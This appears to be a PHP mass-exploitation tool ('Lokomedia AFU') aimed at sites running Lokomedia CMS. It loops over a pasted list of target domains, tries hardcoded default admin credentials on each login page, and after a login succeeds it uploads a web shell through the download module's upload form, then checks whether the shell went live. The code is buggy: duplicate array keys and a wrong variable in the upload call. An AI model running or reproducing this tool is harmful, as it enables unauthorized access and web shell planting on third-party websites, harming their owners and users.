Lokomedia AFU

1. <?php
2. function cek($url) {
3.     $ch = curl_init($url);
4.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
5.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
6.     $res = curl_exec($ch);
7.           curl_close($ch);
8.     return $res;
9. }
10. function curl($url,$payload) {
11.     $ch = curl_init($url);
12.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
13.           curl_setopt($ch, CURLOPT_POST, true);
14.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
15.           curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
16.           curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
17.           curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
18.     $res = curl_exec($ch);
19.           curl_close($ch);
20.     return $res;
21. }
22. echo "<title>Lokomedia File Upload</title><center>
23.     <h1>Lokomedia Shell Upload</h1>
24.     <form method='post'>
25.     Domain: <br>
26.     <textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 250px;'></textarea><br>
27.     <input type='submit' name='hajar' value='Xploit!'>
28.     </form>";
29. if($_POST['hajar']) {
30.     $domain = explode("\r\n", $_POST['url']);
31.     $up = array(
32.         "admin" => "admin",
33.         "admin" => "123456",
34.         "azzatssins" => "azzatssins",
35.         );
36.     foreach($domain as $url) {
37.         foreach($up as $user => $pass) {
38.             $data1 = array(
39.                 "username" => $user,
40.                 "password" => $pass,
41.                 );
42.             $login = curl($url."/adminweb/cek_login.php", $data1);
43.             if(preg_match("/Logout|Administrator/", $login)) {
44.                 $file = "shell/fuck.php"; //1 dir dengan exploiternyaa
45.                 $data2 = array(
46.                     "judul" => "azzatssins cyberserkers",
47.                     "fupload" => "@$file",
48.                     "upload" => " &nbsp;&nbsp;&nbsp;&nbsp; Simpan &nbsp;&nbsp;&nbsp;&nbsp;",
49.                     );
50.                 $ngirim = curl($url."/adminweb/modul/mod_download/aksi_download.php?module=download&act=input",$data);
51.                 if(preg_match("/azzatssins auto exploiter lokomedia/i", $ngirim)) {
52.                     echo "[+] $url -> <font color=green>sukses login [ user: $user pass: $pass ]</font><br>";
53.                     $cek = cek("$url/files/image.php");
54.                     if(preg_match("/azzatssins/", $cek)) {
55.                         echo "[+] $url/files/image.php -> <font color=green>shelmu.</font><br><br>";
56.                     } else {
57.                         echo "[-] <font color='#bb0000'>shellmu gaada.</font><br><br>";
58.                     }
59.                 }
60.             } else {
61.                 echo "[-] $url -> gagal login<br><br>";
62.             }
63.         }
64.     }
65. }
66.  
67.  
68. ?>